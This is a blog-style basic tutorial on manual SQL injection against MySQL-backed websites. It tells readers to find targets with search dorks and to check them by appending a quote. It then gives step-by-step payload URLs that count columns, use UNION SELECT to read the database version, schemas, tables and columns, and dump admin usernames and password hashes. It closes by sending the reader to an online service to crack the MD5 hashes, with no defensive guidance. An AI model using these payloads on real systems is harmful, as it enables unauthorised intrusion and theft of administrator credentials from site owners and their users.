SQL Injection Manual (Basic Tutorial)


Today, I will show you how SQLi can be easy!
This is only a basic tutorial.

Introduction:

This is very simple, just use these dorks with a SQLi scanner, or Google them check every site by yourself:
http://pastebin.com/vAZqkzMx

Now check each site manually to see if it is vulnerable, just add ' at the end of the url:

For example, we have our target,
Code:
http://www.example.net/news_details.php?id=30

Now, we want to check and see if this is SQLi is vulnerable, so we add ' at the end:
Code:
http://www.example.net/news_details.php?id=30'

If we got an error, that means that the site is vulnerable!


So, now we move on to the next step.

How To Find Columns Count:

After you have your vulnerable site, you need to know its column count, to do this, just add "order by X--" at the end of the URL,
X is a number from 1 to unlimited.

For example, we have our target server and we try to count columns,
we add order by 1-- at the end , then order by 2--, etc. Always increase by a number until you get an error on the website like thise one:


So, in our target server, we have tried this:
Code:
http://www.example.net/news_details.php?id=30 order by 1-- >> no error
http://www.example.net/news_details.php?id=30 order by 2-- >> no error
http://www.example.net/news_details.php?id=30 order by 3-- >> no error
http://www.example.net/news_details.php?id=30 order by 4-- >> no error
http://www.example.net/news_details.php?id=30 order by 5-- >> no error
http://www.example.net/news_details.php?id=30 order by 6-- >> no error
http://www.example.net/news_details.php?id=30 order by 7-- >> no error
http://www.example.net/news_details.php?id=30 order by 8-- >> Unknown column

http://www.example.net/news_details.php?id=30 order by 8-- >> Unknown column
That means that the 8th column does not exist, that means that the column count is 7!

How to Find The Accessible Columns:

Now, we know that the column count is 7, the next step is to check for accessible columns, to do that, we use this query "UNION SELECT number,of,columns--" like this:
Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,6,7--

You will get something like this:


That means that we can get information from the site from the 6th, the 2nd and the 3rd column!

How To Get MySQL DB Version:

We need to know the MySQL DB Version to know if we can exploit this site or not, cause every site that is using MySQL 4.x.x, is impossible to work with, but every 5.x.x or above is exploitable.
So to know MySQL DB Version, just replace the number of the used column with "@@version"

For example:
Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--



That means that we can continue working on this site.

How To Find Database Name:

Now , we are going to inject the site to find the DB Name,
to do this, replace the used column number with "group_concat(schema_name)", and add "from information_schema.schemata--" after the last column number, for example:
Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--


Now, to use the one the website uses, replace "group_concat(schema_name)" with "concat(database())" for example:
Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--


Congrats, you got the used DB!

How to Get The Table Names:

Now we need to get table names, to do this, replace the used column number with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()--" at the end of columns number.

Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--


How To Get Column Names:

To get column names, we will use this query:
group_concat(column_name)
from information_schema.columns where table_schema=database()--

Example:
Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--


How To Get Information From Columns:

Now, we are in our final step, now we will get the admin info from column, how to do it?
Simple, follow this example:

Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from currentdb.tableused--

So our exploit will be like this:

Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from example_gh.coc_admin--



Now we need to decrypt the password that is encrypted in md5,
go to http://www.md5decrypter.co.uk/ paste your hash, fill in the captcha and click on decrypt, with a little luck, you will get the password like here:


We have succelfully injected a website, and got the admin info! Thank you for reading my tutorial!

I am not responsible for your actions .

0 comments:

Subscribe to: Post Comments (Atom)
Leave a comment if you like the post !